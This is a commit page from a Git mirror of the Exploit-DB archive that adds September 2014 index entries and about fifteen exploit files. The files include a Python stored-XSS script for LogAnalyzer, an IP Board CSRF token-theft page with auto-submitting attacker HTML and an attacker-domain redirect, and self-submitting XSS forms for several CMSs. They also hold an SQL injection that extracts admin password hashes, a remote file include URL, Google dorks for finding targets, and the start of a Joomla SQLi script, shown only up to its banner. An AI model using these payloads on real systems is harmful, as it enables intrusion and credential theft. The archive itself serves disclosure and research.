bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

Updated 09_09_2014

Browse source
This commit is contained in:
Offensive Security 2014-09-09 04:45:07 +00:00
parent 8d2f2b9c4b
commit d0930d2156
20 changed files with 1010 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
files.csv
View file

@ -30990,6 +30990,7 @@ id,file,description,date,author,platform,type,port
34402,platforms/php/webapps/34402.txt,"OpenSolution Quick.Cart Local File Include and Cross Site Scripting Vulnerabilities",2009-10-08,kl3ryk,php,webapps,0
34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 USER Command Remote Buffer Overflow Vulnerability",2010-07-22,demonalex,windows,dos,0
34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0
34405,platforms/php/webapps/34405.txt,"PHP Stock Management System 1.02 - Multiple Persistent Cross Site Scripting Vulnerabilities",2014-08-25,"Ragha Deepthi K R",php,webapps,0
34408,platforms/multiple/webapps/34408.txt,"Innovaphone PBX Admin-GUI - CSRF Vulnerability",2014-08-25,"Rainer Giedat",multiple,webapps,80
34409,platforms/multiple/webapps/34409.rb,"ManageEngine Password Manager MetadataServlet.dat SQL Injection",2014-08-25,"Pedro Ribeiro",multiple,webapps,8020
34410,platforms/php/webapps/34410.txt,"PHPFinance 0.6 'group.php' SQL Injection and HTML Injection Vulnerabilities",2010-08-05,skskilL,php,webapps,0
@ -31065,6 +31066,7 @@ id,file,description,date,author,platform,type,port
34485,platforms/php/webapps/34485.txt,"FreeSchool 'key_words' Parameter Cross Site Scripting Vulnerability",2009-10-14,"drunken danish rednecks",php,webapps,0
34486,platforms/php/webapps/34486.txt,"PHPCMS2008 'download.php' Information Disclosure Vulnerability",2009-10-19,Securitylab.ir,php,webapps,0
34487,platforms/php/webapps/34487.txt,"Facil Helpdesk kbase/kbase.php URI XSS",2009-08-07,Moudi,php,webapps,0
34489,platforms/windows/local/34489.py,"HTML Help Workshop 1.4 - Local Buffer Overflow Exploit (SEH)",2014-08-31,mr.pr0n,windows,local,0
34492,platforms/asp/webapps/34492.txt,"Online Work Order Suite Lite Edition Multiple Cross Site Scripting Vulnerabilities",2009-08-10,Moudi,asp,webapps,0
34493,platforms/php/webapps/34493.txt,"PPScript 'shop.htm' SQL Injection Vulnerability",2009-08-03,MizoZ,php,webapps,0
34494,platforms/php/webapps/34494.txt,"ViArt Helpdesk products.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
@ -31084,6 +31086,7 @@ id,file,description,date,author,platform,type,port
34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 'register/next' SQL Injection Vulnerability",2010-08-23,Sweet,php,webapps,0
34510,platforms/linux/dos/34510.txt,"OraclMySQL <= 5.1.48 'LOAD DATA INFILE' Denial Of Service Vulnerability",2010-08-20,"Elena Stepanova",linux,dos,0
34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes (admin-ajax.php, img param) - Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80
34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling SEH Buffer Overflow",2014-09-01,k3170makan,windows,local,0
34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Stored XSS Vulnerability",2014-09-01,"Prakhar Prasad",multiple,webapps,0
34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80
34517,platforms/windows/remote/34517.rb,"Wing FTP Server Authenticated Command Execution",2014-09-01,metasploit,windows,remote,5466
@ -31094,6 +31097,7 @@ id,file,description,date,author,platform,type,port
34522,platforms/linux/dos/34522.txt,"Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability",2010-07-09,"Elena Stepanova",linux,dos,0
34523,platforms/multiple/remote/34523.txt,"Nagios XI 'users.php' SQL Injection Vulnerability",2010-08-24,"Adam Baldwin",multiple,remote,0
34524,platforms/php/webapps/34524.txt,"Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80
34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Stored XSS (Python Exploit)",2014-09-02,"Dolev Farhi",multiple,webapps,0
34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit",2014-09-03,D35m0nd142,php,webapps,80
34527,platforms/windows/webapps/34527.c,"Acunetix Web Vulnerability Scanner DLL Loading Arbitrary Code Execution Vulnerability",2010-08-25,Kolor,windows,webapps,0
34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader <= 9.3.4 'AcroForm.api' Memory Corruption Vulnerability",2010-08-25,ITSecTeam,multiple,dos,0
@ -31104,6 +31108,7 @@ id,file,description,date,author,platform,type,port
34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34537,platforms/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses",2010-08-26,"Micha Riser",linux,local,0
34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80
34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80
34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-09-05,"Robert Kugler",windows,dos,0
@ -31117,3 +31122,17 @@ id,file,description,date,author,platform,type,port
34548,platforms/php/webapps/34548.txt,"Datemill photo_view.php return Parameter XSS",2009-09-10,Moudi,php,webapps,0
34549,platforms/php/webapps/34549.txt,"Datemill photo_search.php st Parameter XSS",2009-09-10,Moudi,php,webapps,0
34550,platforms/php/webapps/34550.txt,"Datemill search.php st Parameter XSS",2009-09-10,Moudi,php,webapps,0
34551,platforms/php/webapps/34551.txt,"IP Board 3.x - CSRF Token hjiacking",2014-09-07,"Piotr S.",php,webapps,0
34552,platforms/php/webapps/34552.txt,"LoadedCommerce7 - Systemic Query Factory Vulnerability",2014-09-07,Breaking.Technology,php,webapps,0
34553,platforms/php/webapps/34553.txt,"Wordpress Like Dislike Counter 1.2.3 Plugin - SQL Injection Vulnerability",2014-09-07,Att4ck3r.ir,php,webapps,0
34555,platforms/php/webapps/34555.txt,"PhpOnlineChat 3.0 - XSS",2014-09-07,"N0 Feel",php,webapps,0
34558,platforms/php/webapps/34558.txt,"Amiro.CMS 5.8.4.0 Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0
34559,platforms/php/webapps/34559.txt,"Rumba XML 2.4 'index.php' Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0
34560,platforms/php/webapps/34560.html,"ArtGK CMS Cross Site Scripting and HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0
34561,platforms/php/webapps/34561.txt,"KingCMS 0.6 'CONFIG[AdminPath]' Parameter Remote File Include Vulnerability",2009-09-07,Securitylab.ir,php,webapps,0
34562,platforms/php/webapps/34562.txt,"AdaptBB 1.0 'q' Parameter Cross Site Scripting Vulnerability",2009-10-14,"drunken danish rednecks",php,webapps,0
34563,platforms/php/webapps/34563.txt,"OneCMS 2.6.1 'index.php' Cross Site Scripting Vulnerability",2010-09-02,anT!-Tr0J4n,php,webapps,0
34564,platforms/php/webapps/34564.txt,"CMS WebManager-Pro 'c.php' SQL Injection Vulnerability",2010-09-02,MustLive,php,webapps,0
34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 'nusoap.php' Cross Site Scripting Vulnerability",2010-09-03,"Bogdan Calin",php,webapps,0
34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar <= 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0
34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - CSRF",2014-09-08,"Fikri Fadzil",php,webapps,0

Can't render this file because it is too large.

9
platforms/linux/local/34537.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42779/info
EncFS is prone to design errors in its cryptographic implementation.
Three flaws have been identified that contribute to a weakening of the protections provided under CBC/CFB cipher mode.
Attackers may leverage these weaknesses to attack encrypted files through watermarking or other techniques. Successful attacks may disclose sensitive information.
http://www.exploit-db.com/sploits/34537.tar.gz

51
platforms/multiple/webapps/34525.txt Executable file
View file

@ -0,0 +1,51 @@
Vulnerability title: Syslog LogAnalyzer 3.6.5 Stored XSS
Author: Dolev Farhi
Contact: dolevf at yahoo dot com @dolevff
Application: LogAnalyzer 3.6.5
Date: 8.2.2014
Relevant CVEs: CVE-2014-6070
Vulnerable version: <= 3.6.5
Fixed version: 3.6.6
1. About the application
------------------------
LogAnalyzer is a web interface to syslog and other network event data.
It provides easy browsing, analysis of realtime network events and
reporting services.
2. Vulnerabilities Descriptions:
-----------------------------
It was found that an XSS injection is possible on a syslog server
running LogAnalyzer version 3.6.5.
by changing the hostname of any entity logging to syslog server with
LogAnalyzer to <script>alert("xss")</script>, and sending an arbitrary
syslog message, a client-side script injection execution is possible.
4. proof of concept exploit
-----------------------
#!/usr/bin/python
# Exploit title = LogAnalyzer 3.5.6 Stored XSS injection
# Date: Sept 2014
# CVE: 2014-6070
# Tested on RHEL6.4
import os
import syslog
hostname = os.uname()[1]
payload = "\"<script>alert('XSS');</script>\""
print("+ Setting temporary hostname to " + payload + "...")
os.system("hostname " + payload)
print("+ Injecting the syslog message...")
syslog.syslog("syslog xss injection")
print("+ Check LogAnalyzer dashboard...")
raw_input("+ Press [enter] to restore hostname...")
os.system("hostname " + "\"" + hostname + "\"")
print("+ Hostname restored to " + hostname)

19
platforms/php/webapps/34405.txt Executable file
View file

@ -0,0 +1,19 @@
?# Exploit Title: Multiple Persistent Cross Site Scripting Vulnerabilities
in PHP Stock Management System 1.02
# Date: 25 Aug 2014
# Exploit Author: ?Ragha Deepthi K R
# Vendor Homepage: ?http://www.posnic.com/?
# Software Link:? http://sourceforge.net/projects/stockmanagement/
# Version: ?1.02
# Tested on: Windows 7
#################################################
?PHP Stock Management System 1.02? is vulnerable for ?multiple Persistent
Cross Site Scripting Vulnerabilit?ies.
The vulnerability affects 'sname'(Store Name Field), 'address'(Address
Field), 'place'(Place Field), 'city'(City Field), pin(Pin Field),
website(Website Field), email(Email Field) parameter?s? while updating the
?store details in 'update_details.php' and when seen in 'view_report.php'
#################################################
Greetz :? Syam !?

95
platforms/php/webapps/34551.txt Executable file
View file

@ -0,0 +1,95 @@
#Title: IP Board 3.x CSRF - Token hjiacking
#Date: 03.09.14
#Version: <= 3.4.6
#Vendor: invisionpower.com
#Author: Piotr S.
#Video-PoC: https://www.youtube.com/watch?v=G5P21TA4DjY
1) Introduction
Latest and propabbly previous IPB verions suffers on vulnerability, which allows attacker to steal CSRF token of specific user. Function, which allows users to share forum links, does not properly sanitize user input. Mentioned token is attached in request as GET parameter, so it's able to obtain it if user will be redirected to evil domain. Using the token, it is able to perform various operations as demonstrated in attached video.
2) PoC
Let's take a closer look at following url:
http://community.invisionpower.com/index.php?sharelink=print;aHR0cDovL2NvbW11bml0eS5pbnZpc2lvbnBvd2VyLmNvbS9mb3J1bS5waHA/aWQ9MjMzNQ==
At first glance you can notice b64 string, after decoding it, you may see following address:
http://community.invisionpower.com/forum.php?id=2334
In this case, user should be redirected to default domain of the forum - community.invisionpower.com; it is able to bypass protection in this redirect, by creating particular subdomain on attacker website. it needs to contain address of victim forum otherwise it won't work.
Request:
GET /index.php?sharelink=print;aHR0cDovL2NvbW11bml0eS5pbnZpc2lvbnBvd2VyLmNvbS54b3JiLnBsL2V4cGxvaXQuaHRtbA== HTTP/1.1
Host: community.invisionpower.com
Response:
302
Location: http://community.invisionpower.com.xorb.pl/exploit.html?forcePrint=1&_k=161cc4d2d5503fdb483979f9c164b4d3
Token is delivered as value of GET _k parameter. File to which user is redirected contains javascript, which grabs token that will be used in CSRF request.
3) Reproduction
a) Create subdomain
http://forum.victim_site.com.your_domain.pl
b) Then, create file exploit.html with this content:
<html>
<head>
<script>
onload = function ipboard(){var token = window.location.hash.split('=')[2];document.getElementById('tokens').value=token;};function fo(){document.ipboards.submit();}; setTimeout("fo()",1500);
</script>
</head>
<body>
<form action="http://a10089.try.invisionpower.com/index.php?" method="POST" id="ipboards" name="ipboards" enctype="multipart/form-data">
<input type="hidden" name="TopicTitle" value="hacked!" />
<input type="hidden" name="isRte" value="0" />
<input type="hidden" name="noSmilies" value="0" />
<input type="hidden" name="Post" value="IPboard 3.x 0day" />
<input type="hidden" name="ipsTags" value="
" />
<input type="hidden" name="enableemo" value="yes" />
<input type="hidden" name="enablesig" value="yes" />
<input type="hidden" name="st" value="0" />
<input type="hidden" name="app" value="forums" />
<input type="hidden" name="module" value="post" />
<input type="hidden" name="section" value="post" />
<input type="hidden" name="do" value="new_post_do" />
<input type="hidden" name="s" value="x" />
<input type="hidden" name="p" value="0" />
<input type="hidden" name="t" value="
" />
<input type="hidden" name="f" value="2" />
<input type="hidden" name="parent_id" value="0" />
<input type="hidden" name="attach_post_key" value="x" />
<input type="hidden" id="tokens" name="auth_key" value="7xxx3e9" />
<input type="hidden" name="removeattachid" value="0" />
<input type="hidden" name="dosubmit" value="Post New Topic" />
<input type="submit" value="Submit request" />
</form>
</body>
<h1><b>IP Board 3.X PoC<br/>wait... ;)</b></h1>
</body>
</html>
c) Create payload
http://community.invisionpower.com/index.php?sharelink=print;aHR0cDovL2ZvcnVtLnZpY3RpbV9zaXRlLmNvbS55b3VyX2RvbWFpbi5jb20vZXhwbG9pdC5odG1sIw==
Now send this payload to victim - see video PoC for better understand.
4) References
- https://www.youtube.com/watch?v=G5P21TA4DjY
- https://twitter.com/evil_xorb
Happy hacking!

35
platforms/php/webapps/34552.txt Executable file
View file

@ -0,0 +1,35 @@
Title: LoadedCommerce7 Systemic Query Factory Vulnerability
Credits: Discovered by Breaking Technology Research Labs 2014-06-30
Reference: CVE-2014-5140 - Assigned 31 June 2014
Timeline:
Vendor notified - 29 July 2014
Vendor confirmed exploit 30 July 2014
Severity: Critical
Attack Complexity: Minimal
Classification: SQL injection, unsafe string replacement
Description:
Loaded Commerce 7 shopping cart/online store suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection.
Proof of Concept:
Have a valid customer account and create a new contact in your address book using the following values.
First name: :entry_lastname,
Last Name : ,(select user_name from lc_administrators order by id asc limit 1),(select user_password from lc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)#
The new contact will be added to your address book with the admin hash as the contact's street address
Suggested Fix:
Sanitize all user input before using it as any part of a query-- specifically remove or encode the colon (:) character before passing it to a query value. A similar fix was issued for tomatocart, available at
https://github.com/tomatocart/TomatoCart-v1/pull/238

82
platforms/php/webapps/34553.txt Executable file
View file

@ -0,0 +1,82 @@
#################################################################################################
#
# Title : Wordpress Like Dislike Counter Plugin SQL
Injection Vulnerability
# Risk : High+/Critical
# Exploit Author : XroGuE
# Google Dork :
inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php
AND plugins/pro-like-dislike-counter/ldc-ajax-counter.php
# Plugin Version : 1.2.3
# Plugin Name : Like Dislike Counter
# Plugin Download Link :
http://downloads.wordpress.org/plugin/like-dislike-counter-for-posts-pages-and-comments.zip
# Vendor Home : www.wpfruits.com
# Date : 2014/09/05
# Tested in : Win7 - Linux
#
##################################################################################################
# This Vulnerability Available in Both Version of This Plugin (Free &
Pro Version).
#
# PoC :
#
#
http://localhost/wp/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php
#
# Vulnerable Page : ajax_counter.php
#
# if (!$changedDir)$changedDir =
preg_replace('|wp-content.*$|','',__FILE__);
# include_once($changedDir.'/wp-config.php');
# if(isset($_COOKIE['ul_post_cnt']))
# {
# $posts_present=$_COOKIE['ul_post_cnt'];
# }
# else
# {
# $posts_present=array();
# }
# // Here ------------------------> Inputs Not Filtered ! :|
# $post_id=$_POST['post_id'];
# $up_type=$_POST['up_type'];
# // Here <------------------------
# if($up_type=='c_like'||$up_type=='c_dislike')
# {
# $for_com='c_';
# }
# else
# {
# $for_com='';
# }
# if(!in_array($for_com.$post_id,$posts_present))
# {
# update_post_ul_meta($post_id,$up_type);
# }
# echo get_post_ul_meta($post_id,$up_type);
#
##################################################################################################
# POST
wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php
HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0)
Gecko/20100101 Firefox/31.0 AlexaToolbar/alxf-2.21
# Accept: */*
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Content-Type: application/x-www-form-urlencoded; charset=UTF-8
# X-Requested-With: XMLHttpRequest
# Referer: http://localhost/wp/
# Content-Length: 24
# Connection: keep-alive
# Pragma: no-cache
# Cache-Control: no-cache
# post_id=1&up_type=like
##################################################################################################
#
# Founded By : XroGuE
# Website : http://www.Att4ck3r.ir
# E-Mail : info[at]att4ck3r[Dot]ir
#
##################################################################################################

18
platforms/php/webapps/34555.txt Executable file
View file

@ -0,0 +1,18 @@
# Exploit Title: [phponlinechat xss ]
# Date: [5/9/2014]
# Exploit Author: [N0 Feel]
# Vendor Homepage: [http://phponlinechat.com/phpchat]
# Software Link: [http://phponlinechat.com/chat-free-download.php]
# Version: [3.0]
# Tested on: [win7]
php online chat suffer from xss in user panel
- register as user
- go to : http://path/phpchat/canned_opr.php
- inject javascript evil code into messae filed
demo :
http://phponlinechat.com/phpchat/canned_opr.php
have fun :)

116
platforms/php/webapps/34558.txt Executable file
View file

@ -0,0 +1,116 @@
source: http://www.securityfocus.com/bid/42908/info
Amiro.CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Amiro.CMS 5.8.4.0 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/_admin/faq.php" method="post" name="main" >
<input type="hidden" name="id" value="3" />
<input type="hidden" name="action" value="apply" />
<input type="hidden" name="action_original" value="apply" />
<input type="hidden" name="_form_data" value="1" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="cols" value="" />
<input type="hidden" name="datefrom" value="31.12.1979" />
<input type="hidden" name="enc_datefrom" value="31.12.1979" />
<input type="hidden" name="dateto" value="31.12.2034" />
<input type="hidden" name="enc_dateto" value="31.12.2034" />
<input type="hidden" name="sort" value="answered" />
<input type="hidden" name="enc_sort" value="answered" />
<input type="hidden" name="sdim" value="asc" />
<input type="hidden" name="enc_sdim" value="asc" />
<input type="hidden" name="offset" value="0" />
<input type="hidden" name="enc_offset" value="0" />
<input type="hidden" name="limit" value="10" />
<input type="hidden" name="enc_limit" value="10" />
<input type="hidden" name="_grp_ids" value="" />
<input type="hidden" name="enc__grp_ids" value="" />
<input type="hidden" name="flt_subject_id" value="0" />
<input type="hidden" name="enc_flt_subject_id" value="0" />
<input type="hidden" name="flt_question" value="" />
<input type="hidden" name="enc_flt_question" value="" />
<input type="hidden" name="flt_urgent" value="0" />
<input type="hidden" name="enc_flt_urgent" value="0" />
<input type="hidden" name="public" value="checked" />
<input type="hidden" name="publish" value="" />
<input type="hidden" name="public" value="1" />
<input type="hidden" name="date" value="11.08.2009" />
<input type="hidden" name="cat_id" value="8" />
<input type="hidden" name="catname" value="" />
<input type="hidden" name="author" value="author name" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="send" value="1" />
<input type="hidden" name="sublink" value="faq-page-link" />
<input type="hidden" name="original_sublink" value="faq-page-link" />
<input type="hidden" name="html_title" value="html title" />
<input type="hidden" name="original_html_title" value="html title" />
<input type="hidden" name="html_keywords" value="key1" />
<input type="hidden" name="original_html_keywords" value="key1" />
<input type="hidden" name="is_keywords_manual" value="0" />
<input type="hidden" name="html_description" value='descr"><script>alert(document.cookie)</script>' />
<input type="hidden" name="original_html_description" value="descr" />
<input type="hidden" name="answer" value="answer text" />
<input type="hidden" name="question" value="question text" />
<input type="hidden" name="apply" value="OK" />
</form>
<script>
document.main.submit();
</script>
<form action="http://www.example.com/_admin/news.php" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="id" value="31" />
<input type="hidden" name="action" value="apply" />
<input type="hidden" name="action_original" value="apply" />
<input type="hidden" name="_form_data" value="1" />
<input type="hidden" name="datefrom" value="31.12.1979" />
<input type="hidden" name="enc_datefrom" value="31.12.1979" />
<input type="hidden" name="dateto" value="31.12.2034" />
<input type="hidden" name="enc_dateto" value="31.12.2034" />
<input type="hidden" name="sort" value="id" />
<input type="hidden" name="enc_sort" value="id" />
<input type="hidden" name="sdim" value="desc" />
<input type="hidden" name="enc_sdim" value="desc" />
<input type="hidden" name="offset" value="0" />
<input type="hidden" name="enc_offset" value="0" />
<input type="hidden" name="limit" value="10" />
<input type="hidden" name="enc_limit" value="10" />
<input type="hidden" name="_grp_ids" value="" />
<input type="hidden" name="enc__grp_ids" value="" />
<input type="hidden" name="flt_archive" value="0" />
<input type="hidden" name="enc_flt_archive" value="0" />
<input type="hidden" name="flt_header" value="" />
<input type="hidden" name="enc_flt_header" value="" />
<input type="hidden" name="flt_urgent" value="0" />
<input type="hidden" name="enc_flt_urgent" value="0" />
<input type="hidden" name="publish" value="" />
<input type="hidden" name="arch" value="" />
<input type="hidden" name="ltime" value="1281787153" />
<input type="hidden" name="public" value="1" />
<input type="hidden" name="date" value="28.08.2009" />
<input type="hidden" name="time" value="13:40:07" />
<input type="hidden" name="header" value="header" />
<input type="hidden" name="srv_tags" value="tags" />
<input type="hidden" name="sublink" value="newslink" />
<input type="hidden" name="original_sublink" value="newslink" />
<input type="hidden" name="html_title" value="title" />
<input type="hidden" name="original_html_title" value="title" />
<input type="hidden" name="html_keywords" value='keys"><script>alert(document.cookie)</script>' />
<input type="hidden" name="original_html_keywords" value="keys" />
<input type="hidden" name="is_keywords_manual" value="0" />
<input type="hidden" name="html_description" value="descr" />
<input type="hidden" name="original_html_description" value="descr" />
<input type="hidden" name="body" value="" />
<input type="hidden" name="announce" value="announce" />
<input type="hidden" name="apply" value="OK" />
</form>
<script>
document.main.submit();
</script>

40
platforms/php/webapps/34559.txt Executable file
View file

@ -0,0 +1,40 @@
source: http://www.securityfocus.com/bid/42914/info
Rumba XML is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Rumba XML 2.4 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/index.php" method="post" name="main" >
<input type="hidden" name="sendtags" value="cms" />
<input type="hidden" name="sendid" value="newtag" />
<input type="hidden" name="sendname" value=&#039;New tag"><script>alert(document.cookie)</script>&#039; />
<input type="hidden" name="event" value="add_tag" />
</form>
<script>
document.main.submit();
</script>
<form action="http://www.example.com/index.php" method="post" name="main" >
<input type="hidden" name="sendid" value="rumba_id" />
<input type="hidden" name="sendtitl" value="rumba_titl" />
<input type="hidden" name="sendauthor" value="rumba_author" />
<input type="hidden" name="senddata" value="Sat, 14 Aug 2010 14:34:20" />
<input type="hidden" name="sendlost" value="0" />
<input type="hidden" name="senddesc" value=&#039;rumba_desc"><script>alert(document.cookie)</script>&#039; />
<input type="hidden" name="sendanons" value="rumba_anons" />
<input type="hidden" name="sendtext" value="rumba_text" />
<input type="hidden" name="sendtags" value="service" />
<input type="hidden" name="sendcomm" value="yes" />
<input type="hidden" name="add-end" value="begin" />
<input type="hidden" name="send_old_id" value="rumba_old_id" />
<input type="hidden" name="event" value="add_page" />
</form>
<script>
document.main.submit();
</script>

7
platforms/php/webapps/34560.html Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42923/info
ArtGK CMS is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
<form action="http://host/cms/action?async=exit" method="post" name="main" > <input type="hidden" name="_a[0][action]" value="saveAndPublish" /> <input type="hidden" name="_a[0][id]" value="1" /> <input type="hidden" name="_a[0][vars][title]" value="page title" /> <input type="hidden" name="_a[0][vars][description]" value="description" /> <input type="hidden" name="_a[0][vars][keywords]" value="metakeys" /> <input type="hidden" name="_a[0][vars][link]" value="/" /> <input type="hidden" name="_a[0][vars][use_content_in_head]" value="path" /> <input type="hidden" name="_a[0][vars][head]" value='<script type="text/javascript" src="/cms/js/ajax.js"> </script><meta name="keywords" content="keywords"/><meta name="description" content="Description"/><script>alert(document.cookie)</script><title>Site Title</title>' /> </form> <script> document.main.submit(); </script>

9
platforms/php/webapps/34561.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42924/info
KingCMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
KingCMS 0.6.0 is vulnerable; other versions may be affected.
http://www.example.com/[path]/include/engine/content/elements/block.php? CONFIG[AdminPath] =[SHELL]

9
platforms/php/webapps/34562.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42930/info
AdaptBB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
AdaptBB 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?do=search&q=PUUUUKE%22%27%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&x=0&y=0

9
platforms/php/webapps/34563.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42949/info
OneCMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
OneCMS version 2.6.1 is vulnerable; others may also be affected.
http://www.example.com/index.php?load=elite&view=1%3C/title%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

7
platforms/php/webapps/34564.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42951/info
CMS WebManager-Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/c.php?id=1%20and%20version()=5

9
platforms/php/webapps/34565.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42959/info
NuSOAP is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
NuSOAP 0.9.5 is vulnerable; other versions may be affected.
http://www.example.com/filename.php/1%3CScRiPt%3Eprompt(923395)%3C/ScRiPt%3E"

308
platforms/php/webapps/34571.py Executable file
View file

@ -0,0 +1,308 @@
#!/usr/bin/env python
#
#
# Exploit Title : Joomla Spider Calendar <= 3.2.6 SQL Injection
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://web-dorado.com/
#
# Software Link : http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/22329
#
# Dork Google: inurl:option=com_spidercalendar
#
# Date : 2014-08-31
#
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
#
#
#
######################
#
# PoC Exploit:
#
# http://localhost/joomla/index.php?option=com_spidercalendar&calendar_id=1 [SQLi]
#
#
# "calendar_id" and "calendar" variables are not sanitized.
#
#
# Vulnerability Disclosure Timeline:
#
# 2014-08-31: Discovered vulnerability
# 2014-09-04: Vendor Notification
# 2014-09-05: Vendor Response/Feedback
# 2014-09-05: Vendor Fix/Patch
# 2014-09-05: Public Disclosure
import codecs
import httplib
import re
import sys
import socket
import optparse
banner = """
$$$$$\ $$\ $$$$$$\ $$\ $$\
\__$$ | $$ | $$ __$$\ \__| $$ |
$$ | $$$$$$\ $$$$$$\ $$$$$$\$$$$\ $$ | $$$$$$\ $$ / \__| $$$$$$\ $$\ $$$$$$$ | $$$$$$\ $$$$$$\
$$ |$$ __$$\ $$ __$$\ $$ _$$ _$$\ $$ | \____$$\ \$$$$$$\ $$ __$$\ $$ |$$ __$$ |$$ __$$\ $$ __$$\
